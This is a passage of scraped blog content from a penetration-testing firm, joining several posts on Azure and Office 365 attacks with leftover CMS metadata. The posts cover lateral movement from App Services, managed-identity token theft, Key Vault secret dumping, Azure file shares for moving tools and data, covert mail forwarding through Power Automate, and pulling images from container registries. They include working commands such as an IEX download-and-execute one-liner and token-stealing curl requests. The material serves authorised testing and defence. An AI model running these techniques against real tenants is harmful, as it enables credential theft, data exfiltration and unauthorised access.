Using the Azure Storage Explorer, copy the Storage Account connection string and use that to add a new Storage Account.

Now that you have access to the Storage Account, you should be able to see any files that the application has rights to.


Accessing Azure SQL Databases

Similar to the Storage Accounts, you may find connection strings for Azure SQL in the configuration files or environmental variables. Most Azure SQL servers that I encounter have access locked down to specific IP ranges, so you may not be able to remotely access the servers from the internet. Every once in a while, we'll find a server with 0.0.0.0-255.255.255.255 in its allowed list, but that's pretty rare.

Since direct SQL access from the internet is unlikely, we will need an alternative that works from within the App Services host.

Azure SQL from Windows:

For Windows, we can plug in the values from our connection string and make use of PowerUpSQL to access Azure SQL databases.

Confirm Access to the "sql-test" Database on the "netspi-test" Azure SQL server:

D:\home\site\wwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLConnectionTest -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 | ft -wrap"


ComputerName                     Instance                         Status    
------------                     --------                         ------    
netspi-test.database.windows.net netspi-test.database.windows.net Accessible

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

D:\home\site\wwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLQuery -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 -Query 'select @@version' | ft -wrap"


Column1                                                                        
-------                                                                        
Microsoft SQL Azure (RTM) - 12.0.2000.8                                        
    Jul 31 2020 08:26:29                                                          
    Copyright (C) 2019 Microsoft Corporation

From here, you can modify the query to search the database for more information.

For more ideas on pivoting via Azure SQL, check out the PowerUpSQL GitHub repository and Scott Sutherland's NetSPI blog author page.

Azure SQL from Linux:

For Linux hosts, you will need to check the stack that you're running (Node, Python, PHP, .NET Core, Ruby, or Java). In your shell, run "printenv | grep -i version" and look for things like RUBY_VERSION or PYTHON_VERSION.

For simplicity, we will assume that we are set up with the Python Stack and pyodbc is already installed as a module. For this, we will use a pretty basic Python script to query the database.

Other stacks will (most likely) require some different scripting or clients that are more compatible with the provided stack, but we'll save that for another blog.

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

root@567327e35d3c:/home# cat sqlQuery.py
import pyodbc
server = 'netspi-test.database.windows.net'
database = 'sql-test'
username = 'MyUser'
password = '123Password456'
driver= '{ODBC Driver 17 for SQL Server}'

with pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=1433;DATABASE='+database+';UID='+username+';PWD='+ password) as conn:
        with conn.cursor() as cursor:
                cursor.execute("SELECT @@version")
                row = cursor.fetchone()
                while row:
                        print (str(row[0]))
                        row = cursor.fetchone()

root@567327e35d3c:/home# python sqlQuery.py
Microsoft SQL Azure (RTM) - 12.0.2000.8
        Jul 31 2020 08:26:29
        Copyright (C) 2019 Microsoft Corporation

Your best bet for deploying this script to the host is probably downloading it from a remote source. Trying to manually edit Python over the Azure web-based SSH connection is not going to be a fun time.

More generally, trying to do much of anything in these Linux hosts may be tricky. For this blog, I was working in a sample app that I spun up for myself and immediately ran into multiple issues, so your mileage may vary here.

For more information about using Python with Azure SQL, check out Microsoft's documentation.

Abusing Managed Identities to Get Tokens

An application/VM/etc. can be configured with a Managed Identity that is given rights to specific resources in the subscription via IAM policies. This is a handy way of granting access to resources, but it can be used for lateral movement and privilege escalation.

We've previously covered Managed Identities for VMs on the Azure Privilege Escalation Using Managed Identities blog post. If the application is configured with a Managed Identity, you may be able to use the privileges of that identity to pivot to other resources in the subscription and potentially escalate privileges in the subscription/tenant.

In the next section, we'll cover getting tokens for a Managed Identity that can be used with the management.azure.com REST APIs to determine the resources that your identity has access to.

Getting Tokens

There are two different ways to get tokens out of your App Services application. Each of these depend on different versions of the REST API, so depending on the environmental variables that you have at your disposal, you may need to choose one or the other.

*Note that if you're following along in the Console, the Windows commands will require writing that token to a file first, as Curl doesn't play nice with the Console output.

Windows:

  • MSI Secret Option:
curl "%MSI_ENDPOINT%?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%MSI_SECRET% -o token.txt
type token.txt
  • X-IDENTITY-HEADER Option:
curl "%IDENTITY_ENDPOINT%?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:%IDENTITY_HEADER% -o token.txt
type token.txt

Linux:

  • MSI Secret Option:
curl "$MSI_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$MSI_SECRET
  • X-IDENTITY-HEADER Option:
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER

For additional reference material on this process, check out the Microsoft documentation.

These tokens can now be used with the REST APIs to gather more information about the subscription. We could do an entire post covering all of the different ways you can gather data with these tokens, but here are a few key areas to focus on.
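
As a simple first check with a management-scoped token, you can list the subscriptions that the identity can see (a hedged example; the API version is just one that works at the time of writing):

# List the subscriptions visible to the Managed Identity
$headers = @{ Authorization = "Bearer $token" }
Invoke-RestMethod -Uri "https://management.azure.com/subscriptions?api-version=2020-01-01" -Headers $headers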

Accessing Key Vaults with Tokens

Using a Managed Identity token, you may be able to pivot over to any Key Vaults that the identity has access to. In order to retrieve these Key Vault values, we will need a token that's scoped to vault.azure.net. To get this vault token, use the previous process, and change the "resource" URL to https://vault.azure.net.

I would recommend setting two tokens as variables in PowerShell on your own system (outside of App Services):

$mgmtToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"
$kvToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"

And then pass those two variables into the following MicroBurst functions:

Get-AzKeyVaultKeysREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose
Get-AzKeyVaultSecretsREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose

These functions will poll the subscription for any available Key Vaults, and attempt to read keys/secrets out of the vaults. In the example below, our Managed Identity only had access to one vault (netspi-private) and one secret (TestKey) in that vault.

[Screenshot: the TestKey secret from the netspi-private vault returned by the MicroBurst functions]

Accessing Storage Accounts with Tokens

Outside of any existing storage accounts that may be configured in the app (See Above), there may be additional storage accounts that the Managed Identity has access to.

Use the Get-AZStorageKeysREST function within MicroBurst to dump out any additional available storage keys that the identity may have access to. This was previously covered in the Gathering Bearer Tokens from Azure Services blog, but you will want to use a token scoped to management.azure.com with this function.

Get-AZStorageKeysREST -token YOUR_TOKEN_HERE

As previously mentioned, we could do a whole series on the different ways that we could use these Managed Identity tokens, so keep an eye out for future posts here.

Conclusion

Got a shell on an Azure App Services host? Don't assume that the cloud has (yet again) solved all the security problems in the world. There are plenty of options to potentially pivot from the App Services host, and hopefully you can use one of them from here.

From a defender's perspective, I have a couple of recommendations:

  • Test your web applications regularly
  • Utilize the Azure Web Application Firewalls (WAF) to help with coverage
  • Configure your Managed Identities with least privilege
    • Consider architecture that allows other identities in the subscription to do the heavy lifting
    • Don't give subscription-wide permissions to Managed Identities

Prior Work

I've been working on putting this together for a while, but during that time David Okeyode put out a recording of a presentation he did for the Virtual Azure Community Day that pretty closely follows these attack paths. Check out David's video for a great walkthrough of a real life scenario.

For other interesting work on Azure tokens, Tenant enumeration, and Azure AD, check out Dirk-jan Mollema's work on his blog. - https://dirkjanm.io/

[post_title] => Lateral Movement in Azure App Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => lateral-movement-azure-app-services [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:26:40 [post_modified_gmt] => 2023-03-16 14:26:40 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11728 [menu_order] => 416 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 11720 [post_author] => 10 [post_date] => 2020-07-29 07:00:30 [post_date_gmt] => 2020-07-29 07:00:30 [post_content] =>

Get-AzPasswords is a function within the MicroBurst toolkit that's used to get passwords from Azure subscriptions using the Az PowerShell modules. As part of this, the function supports gathering passwords and certificates that are attached to automation accounts.

These credentials can be stored in a few different ways:

  • Credentials - Username/Password combinations
  • Connections - Service Principal accounts that you can assume the identity of
  • Certificates - Certs that can be used in the runbooks

If you have the ability to write and run runbooks in an automation account, each of these credentials can be retrieved in a usable format (cleartext or files). All of the stored automation account credentials require a runbook to retrieve, and we really only have one easy option for returning them to Get-AzPasswords: print the credentials to the runbook output as part of the extraction script.

The Problem

The primary issue with writing these credentials to the runbook job output is that they become available to anyone who has rights to read the job output.

[Screenshot: cleartext credentials visible in the runbook job output]

By exporting credentials through the job output, an attacker could unintentionally expose automation account credentials to lesser-privileged users, creating an opportunity for privilege escalation. As responsible pen testers, we don't want to leave an environment more vulnerable than it was when we started testing, so writing the credentials to the output logs in cleartext is not acceptable.

The Solution

To work around this issue, we've implemented a certificate-based encryption scheme in the Get-AzPasswords function to encrypt any credentials in the log output.

The automation account portion of the Get-AzPasswords function now uses the following process (a rough client-side sketch follows the list):

  1. Create a new self-signed certificate (microburst) on the system that is running the function
  2. Export the public certificate to a local file
  3. Encode the certificate file into a base64 string to use in the automation runbook
  4. Decode the base64 bytes to a cer file and import the certificate in the automation account
  5. Use the certificate to encrypt (Protect-CmsMessage) the credential data before it's written to the output
  6. Decrypt (Unprotect-CmsMessage) the output when it's retrieved on the testing system
  7. Remove the self-signed cert from the certificate store and delete the local file from the testing system
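
A rough sketch of the client side of this process (steps 1-3 and 6-7), assuming PowerShell 5.1+ for the self-signed certificate and CMS cmdlets; the $encryptedJobOutput variable is a placeholder for the encrypted blob retrieved from the job logs:

# Steps 1-3: create a document-encryption cert and base64-encode the public half
$cert = New-SelfSignedCertificate -Subject "CN=microburst" -CertStoreLocation Cert:\CurrentUser\My -Type DocumentEncryptionCert
Export-Certificate -Cert $cert -FilePath .\microburst.cer | Out-Null
$certB64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes(".\microburst.cer"))

# $certB64 ships with the runbook, which decodes/imports it and wraps the credentials:
# Protect-CmsMessage -To .\microburst.cer -Content $credentialData

# Step 6: decrypt the retrieved job output back on the testing system
$credentialData = Unprotect-CmsMessage -Content $encryptedJobOutput

# Step 7: remove the cert from the store and delete the local file
Remove-Item $cert.PSPath
Remove-Item .\microburst.cer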

This process protects the credentials in the logs and in transit. Since each certificate is generated at runtime, there's little risk of someone decrypting the credential data from the logs after the fact.

The Results

Those same credentials from above will now look like this in the output logs:

[Screenshot: encrypted credential data in the output logs]

On the Get-AzPasswords side of this, you won't see any difference from previous versions. Any credentials gathered from automation accounts will still be available in cleartext in the script output, but now the credentials will be protected in the output logs.

For anyone making use of Get-AzPasswords in MicroBurst, make sure that you grab the latest version from NetSPI's GitHub - https://github.com/NetSPI/MicroBurst

[post_title] => Get-AzPasswords: Encrypting Automation Password Data

For many years, pentester-hosted SMB shares have been a common technique during internal penetration tests for getting tools over to, and data off of, target systems. The process is simple: share a folder from your testing system, execute a "net use z: \\testingbox\tools" from your target, and run your tools from the share.

For a long time, this could be used to evade host-based protection software. While this is all based on anecdotal evidence, I believe that this was mainly due to defensive software being cautious with network shares: if AV detects a payload on a shared drive (“Finance”) and quarantines the whole share, that could impact multiple users on the network.

As we’ve all continued to migrate up to the cloud, we’re finding that SMB shares can still be used for testing, and can be augmented using cloud services. As I previously mentioned on the NetSPI blog, Azure services can be a handy way to bypass outbound domain filters/restrictions during assessments. Microsoft-hosted Azure file shares can be used, just like the previously mentioned on-prem SMB shares, to run tools and exfiltrate data.

Setting Up Azure File Shares

Using Azure storage accounts, it’s simple to set up a file share service. Create a new account in your subscription, or navigate to the Storage Account that you want to use for your testing and click the “+ File Share” tab to create a new file share.

For both the file share and the storage account name, I would recommend using names that attempt to look legitimate. Ultimately the share path may end up in log files, so something along the lines of \\hackertools.file.core.windows.net\payloads may be a bad choice.

Connecting to Shares

After setting up the share, mapping the drive from a Windows host is pretty simple. You can just copy the PowerShell code directly from the Azure Portal.

Or you can simplify things by removing the connectTestResult commands from that script:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure\STORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | Out-Null

Where STORAGE_ACCT_NAME is the name of your storage account, and STORAGE_ACCT_KEY is the key used for mapping shares (found under “Access Keys” in the Storage Account menu).

I've found that the connection test code will frequently fail, even if you can map the drive. So there's not a huge benefit in keeping that connection test in the script.
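
If you still want a quick reachability check before mapping the drive, a simple TCP port test covers it:

# Verify that outbound 445/TCP to the storage account is open
Test-NetConnection -ComputerName STORAGE_ACCT_NAME.file.core.windows.net -Port 445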

Now that we have our drive mapped, you can run your tools from the drive. Your mileage may vary for different executables, but I’ve recently had luck using this technique as a way of getting tools onto, and data out of, a cloud-hosted system that I had access to.

Removing Shares

As for clean up, we will want to remove the added drive when we are done, and remove any cmdkeys from our target system.

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

It also wouldn’t hurt to cycle those keys on our end to prevent the old ones from being used again. This can be done using the blue refresh button from the “Access Keys” section in the portal.
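
If you'd rather cycle the keys from PowerShell than from the portal, the Az module can do it; the resource group name here is a placeholder:

# Regenerate key1 for the storage account (repeat with -KeyName key2)
New-AzStorageAccountKey -ResourceGroupName "TESTING_RG" -Name "STORAGE_ACCT_NAME" -KeyName key1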

To make this a little more portable for a cloud environment, where we may be executing PowerShell on VMs through cloud functions, we can just do everything in one script:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure\STORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | Out-Null

# Insert Your Commands Here

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

*You may need to change the mapped PS Drive letter, if it’s already in use.

I was recently able to use this in an AWS environment with the Run Command feature in the AWS Systems Manager service, but this could work anywhere that you have command execution on a host, and want to stay off of the local disk.

Conclusion

The one big caveat for this methodology is the availability of outbound SMB connections. While you may assume that most networks would disallow outbound SMB to the internet, it’s actually pretty rare for us to see outbound restrictions on SMB traffic from cloud provider (AWS, Azure, etc.) networks. Most default cloud network policies allow all outbound ports and protocols to all destinations. So this may get more mileage during your assessments against cloud hosts, but don't be surprised if you can use Azure file shares from an internal network.

[post_title] => Azure File Shares for Pentesters

During a recent Office 365 assessment, we ran into an interesting situation where Exchange was configured to disallow any external domain forwarding rules. This configuration is intended to prevent attackers from compromising an account and setting up forwarding for remote mail access and persistence. Part of this assessment was to validate that these configurations were properly implemented, and also to look for potential bypasses for this configuration.

Power Automate

As part of the Office 365 environment, we had access to the Power Automate application. Formerly known as Microsoft Flow, Power Automate is a framework for gluing together multiple services for automation tasks within Office 365.

Want to get an email every time someone uploads a file to your shared OneDrive folder? Connect Outlook and OneDrive in Power Automate and set up a flow. I like to think of it as IFTTT for the Microsoft ecosystem.

Forwarding Email

Since we were able to create connections and flows in Power Automate, we decided to connect Power Automate to Office 365 Outlook and create a flow for forwarding email to a NetSPI email address.

You can use the following process to set up external mail forwarding with Power Automate:

1. Under the Data menu, select "Connections".

2. Select "New Connection" at the top of the window, and find the "Office 365 Outlook" connection.

3. Select "Create" on the connection and authorize the connection under the OAuth pop-up.

4. Navigate to the "Create" section from the left navigation menu, and select "Automated flow".

5. Name the flow (OutlookForward) and search for the "When a new email arrives (V3)" Office 365 Outlook trigger.

6. Select any advanced options and add a new step.

7. In the added step, search for the Office 365 Outlook connection, and find the "Forward an email (V2)" action.

8. From the "Add dynamic content" link, find "Message Id" and select it for the Message Id.

9. Set your "To" address to the email address that you'd like to forward the message to.

10. Optional, but highly recommended - add one more step, "Mark as read or unread (V2)", from the Office 365 Outlook connection, and mark the message as Unread. This will hopefully make the forwarding activity less obvious to the compromised account.

11. Save the flow and wait for the emails to start coming in.

You can also test the flow in the editor. It should look like this:

[Screenshot: a successful test run of the flow]

Taking it further

While forwarding email to an external account is handy, it may not accomplish the goal that we're going for.

Here are a few more ideas for interesting things that could be done with Power Automate:

  • Use "Office 365 Users - Search for users (V2)" to do domain user enumeration
    • Export the results to an Excel file stored in OneDrive
  • Use the enumerated users list as targets for an email phishing message, sent from the compromised account
    • Watch an inbox for the template message, use the message body as your phishing email
  • Connect "OneDrive for Business" and an external file storage provider (Dropbox/SFTP/Google Drive) to mirror each other
    • When a file is created or modified, copy it to Dropbox
  • Connect Azure AD with an admin account to create a new user
    • Trigger the flow with an email to help with persistence.

Fixing the Issue

It looks like it is possible to disable Power Automate for users, but you may have legitimate business reasons for using it. Alternatively, Microsoft Flow audit events are available in the Office 365 Security & Compliance Center, so you can at least log and alert on the creation of new flows.
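
As a starting point for that alerting, the unified audit log can be queried from the Exchange Online PowerShell module. This sketch assumes auditing is enabled and that flow creations are logged under the MicrosoftFlow record type:

# Look for flows created in the last 7 days
Connect-ExchangeOnline
Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-7) -EndDate (Get-Date) -RecordType MicrosoftFlow -Operations CreateFlow -ResultSize 100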

For anyone looking to map these activities back to the MITRE ATT&CK framework, check out these links:

Prior Work

Some prior Microsoft Flow research was presented at DerbyCon in 2019 by Trent Lo - https://www.youtube.com/watch?v=80xUTJPlhZc

[post_title] => Bypassing External Mail Forwarding Restrictions with Power Automate

Azure Container Registries are Microsoft's solution for managing Docker images in the cloud. The service allows for authentication with AzureAD credentials, or an "Admin user" that shares its name with the registry.

For the purposes of this blog, let's assume that you've compromised some Admin user credentials for an Azure Container Registry (ACR). These credentials may have been accidentally uploaded to GitHub, found on a Jenkins server, or discovered in any number of random places that you may be able to find credentials.

Alternatively, you may have used the recently updated version of Get-AzPasswords to dump out ACR admin credentials from an Azure subscription. If you already have rights to do that, you may just want to skip to the end of this post to see the AZ CLI commands that you can use instead.

The credentials will most likely be in a username/password format, with a registry URL attached (EXAMPLEACR.azurecr.io).

Now that you have these credentials, we'll go through next steps that you can take to access the registry and (hopefully) escalate your privileges in the Azure subscription.

Logging In

The login portion of this process is really simple. Enter the username, registry URL, and the password into the following docker command:

docker login -u USER_NAME EXAMPLEACR.azurecr.io

If the credentials are valid, you should get a "Login Succeeded".

Enumerating Container Images and Tags

In order to access the container images, we will need to enumerate the image names and available tags. Normally, I would do this through an authenticated AZ CLI session (see below), but since we only have the ACR credentials, we will have to use the Docker Registry APIs to do this.

For starters we will use the "_catalog" API to list out all of the images for the registry. This needs to be done with authentication, so we will use the ACR credentials in a Basic Authorization (Base64[USER:PASS]) header to request "https://EXAMPLEACR.azurecr.io/v2/_catalog".

Sample PowerShell code:

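The sample boils down to a Basic-auth GET against the catalog endpoint. A minimal sketch, with the credential values as placeholders:

# Build the Basic Authorization header from the ACR admin credentials
$username = "EXAMPLEACR"
$password = 'A_$uper_g00D_P@ssW0rd'
$basicAuth = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("$($username):$($password)"))
$headers = @{ Authorization = "Basic $basicAuth" }

# List every repository (image) in the registry
$catalog = Invoke-RestMethod -Uri "https://EXAMPLEACR.azurecr.io/v2/_catalog" -Headers $headers
$catalog.repositories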

Now that we have a list of images, we will want to find the current tags for each image. This can be done by making additional API requests to the following URL (where IMAGE_NAME is the one you want the tags for) - https://EXAMPLEACR.azurecr.io/v2/IMAGE_NAME/tags/list

Sample PowerShell code:

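The tag enumeration is one more authenticated GET per image; a matching sketch, reusing the $headers and $catalog values from above:

# Pull the tag list for each image found in the catalog
foreach ($image in $catalog.repositories) {
    $tags = Invoke-RestMethod -Uri "https://EXAMPLEACR.azurecr.io/v2/$image/tags/list" -Headers $headers
    "$image : $($tags.tags -join ', ')"
}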

To make this whole process easier, I've wrapped the above code into a PowerShell function (Get-AzACR) in MicroBurst to help.

PS C:\> Get-AzACR -username EXAMPLEACR -password A_$uper_g00D_P@ssW0rd -registry EXAMPLEACR.azurecr.io
docker pull EXAMPLEACR.azurecr.io/arepository:4
docker pull EXAMPLEACR.azurecr.io/dockercore:1234
docker pull EXAMPLEACR.azurecr.io/devabcdefg:2020
docker pull EXAMPLEACR.azurecr.io/devhijklmn:4321
docker pull EXAMPLEACR.azurecr.io/imagetester:10
docker pull EXAMPLEACR.azurecr.io/qatestimage:1023
...

As you can see above, this script will output the docker commands that you can run to "pull" each image (with the first available tag).

Important note: the first tag returned by the APIs may not be the latest tag for the image. The API is not great about returning metadata for the tags, so it's a bit of a guessing game for which tag is the most current. If you want to see all tags for all images, just use the -all flag on the script.

Append the output of the script to a .ps1 file and run it to pull all of the container images to your testing system (watch your disk space). Alternatively, you can just pick and choose the images that you want to look at one at a time:

PS C:\> docker pull EXAMPLEACR.azurecr.io/dockercore:1234
1234: Pulling from dockercore
[Truncated]
6638d86fd3ee: Download complete
6638d86fd3ee: Pull complete
Digest: sha256:2c[Truncated]73
Status: Downloaded image for EXAMPLEACR.azurecr.io/dockercore:1234
EXAMPLEACR.azurecr.io/dockercore:1234

Fun fact - This script should also work with regular docker registries. I haven't had a non-Azure registry to try this against yet, but I wouldn't be surprised if this worked against a standard Docker registry server.

Running Docker Containers

Once we have the container images on our testing system, we will want to run them.

Here's an example command for running a container from the dockercore image with an interactive entrypoint of "/bin/bash":

docker run -it --entrypoint /bin/bash EXAMPLEACR.azurecr.io/dockercore:1234

*This example assumes bash is an available binary in the container; that may not always be the case.

With access to the container, we can start looking at any local files, and potentially find secrets in the container.
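
You can also triage an image statically before (or instead of) shelling in; docker's built-in inspection commands will surface environment variables and build steps that often leak secrets:

# Dump the image's configured environment variables
docker inspect EXAMPLEACR.azurecr.io/dockercore:1234 --format '{{json .Config.Env}}'

# Review the layer history for ADD/COPY steps and suspicious RUN commands
docker history --no-trunc EXAMPLEACR.azurecr.io/dockercore:1234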

Real World Example

For those wondering how this could be practical in the real world, here's an example from a recent Azure cloud pen test.

  1. Azure Storage Account exposed a Terraform script containing ACR credentials
  2. NetSPI connected to the ACR with Docker
  3. Listed out the images and tags with the above process
  4. NetSPI used Docker to pull images from the registry
  5. Ran bash shells on each image and reviewed available files
  6. Identified Azure storage keys, Key Vault keys, and Service Principal credentials for the subscription

TL;DR - Anonymous access to ACR credentials resulted in Service Principal credentials for the subscription

Using the AZ CLI

If you already happen to have access to an Azure subscription where you have ACR reader (or subscription reader) rights on a container registry, the AZ CLI is your best bet for enumerating images and tags.

From an authenticated AZ CLI session, you can list the registries in the subscription:

PS C:\> az acr list
[
  {
    "adminUserEnabled": true,
    "creationDate": "2019-09-17T20:42:28.689397+00:00",
    "id": "/subscriptions/d4[Truncated]b2/resourceGroups/ACRtest/providers/Microsoft.ContainerRegistry/registries/netspiACR",
    "location": "centralus",
    "loginServer": "netspiACR.azurecr.io",
    "name": "netspiACR",
    [Truncated]
    "type": "Microsoft.ContainerRegistry/registries"
  }
]

Select the registry that you want to attack (netspiACR) and use the following command to list out the images:

PS C:\> az acr repository list --name netspiACR
[
  "ACRtestImage"
]

List tags for a container image (ACRtestImage):

PS C:\> az acr repository show-tags --name netspiACR --repository ACRtestImage
[
  "latest"
]

Authenticate with Docker

PS C:\> az acr login --name netspiACR
Login Succeeded

Once you are authenticated and have the container image name and tag, the "docker pull" process will be the same as above.

Conclusion

Azure Container Registries are a great way to manage Docker images for your Azure infrastructure, but be careful with the credentials. Additionally, if you are using a premium SKU for your registry, restrict the access for the ACR to specific networks. This will help reduce the availability of the ACR in the event of the credentials being compromised. Finally, watch out for Reader rights on Azure Container Registries. Readers have rights to list and pull any images in a registry, so they may have more access than you expected.

[post_title] => Attacking Azure Container Registries with Compromised Credentials

As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and the cloud infrastructure. Attackers, meanwhile, are automated and capable. They continuously probe for access and vulnerabilities on many different levels, and their success usually results from human error in code or infrastructure configurations, such as open admin ports and over-privileged identity roles.

During this co-sponsored webinar, you will learn how to better secure both the application layer and cloud infrastructure, using both automated tools and capable penetration testers to uncover logic flaws and other soft spots. NetSPI and DisruptOps will share how to find and remediate your own vulnerabilities more efficiently, before the attackers do.

Watch the recording: https://youtu.be/4B9ZTgwkReM